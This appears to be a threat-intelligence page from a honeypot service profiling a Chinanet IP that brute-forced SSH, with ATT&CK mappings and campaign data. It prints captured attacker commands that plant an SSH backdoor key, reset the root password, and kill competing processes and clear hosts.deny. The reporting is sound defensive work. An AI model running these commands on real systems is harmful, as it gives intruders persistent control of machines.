IntrusionLabs / threat intelligence

Sign in

← Back to feed

122.247.15.221

Threat Confidence

46%

Location

🇨🇳 CN

ASN

AS4134 · Chinanet

Cloud Provider

—

Total Events

90

Above average by volume

Agent Count

1

First / Last Seen

2026-04-08 18:54 — 2026-04-08 19:05

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Reconnaissance

T1595

Initial Access

T1078

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Discovery

T1046 T1082 T1083

Command and Control

T1105

External Corroboration

Not flagged by any external feeds

Campaigns

AS4134 Chinanet ASN Active medium 🇨🇳 CN

67 IPs 4457 events

mysql:bruteforcessh:bruteforce

2026-02-18 — ongoing · 67 IPs from the same network (Chinanet, AS4134) were active during overlapping time periods. Temporal correlation across a …

Session Forensics

scanner ×6 malware_dropper ×1 credential_harvester ×3

Sessions

10 (1 with login)

Avg Depth Score

0.29

Commands Executed

20

Files Downloaded

2

Notable Commands

cd ~; chattr -ia .ssh; lockr -ia .ssh
lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo "root:JRmhx7etaGNt"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls

Fingerprints

HASSH

03a80b21afa810682a776a7d42e5e6fb

SSH Client

SSH-2.0-libssh_0.11.1

Evidence Timeline

Scanner 7c4e29192290 w4m_singapore_01 · 2026-04-08 19:03

15%

Loading events...

Scanner 45a427b1d4e9 w4m_singapore_01 · 2026-04-08 19:01

15%

Loading events...

Credential Harvester 6d4335974680 w4m_singapore_01 · 2026-04-08 19:03

1 35%

Loading events...

Scanner 649b93075f5c w4m_singapore_01 · 2026-04-08 19:01

15%

Loading events...

Credential Harvester 7996c5b84734 w4m_singapore_01 · 2026-04-08 19:03

1 35%

Loading events...

Scanner 696013df7317 w4m_singapore_01 · 2026-04-08 19:01

15%

Loading events...

Malware Dropper cc191da889f4 w4m_singapore_01 · 2026-04-08 19:01

20 2 1 100%

Loading events...

Scanner 92a84923e698 w4m_singapore_01 · 2026-04-08 18:57

15%

Loading events...

Scanner 5fac58c2012a w4m_singapore_01 · 2026-04-08 18:57

15%

Loading events...

Credential Harvester e874ec1045aa w4m_singapore_01 · 2026-04-08 18:54

1 35%

Loading events...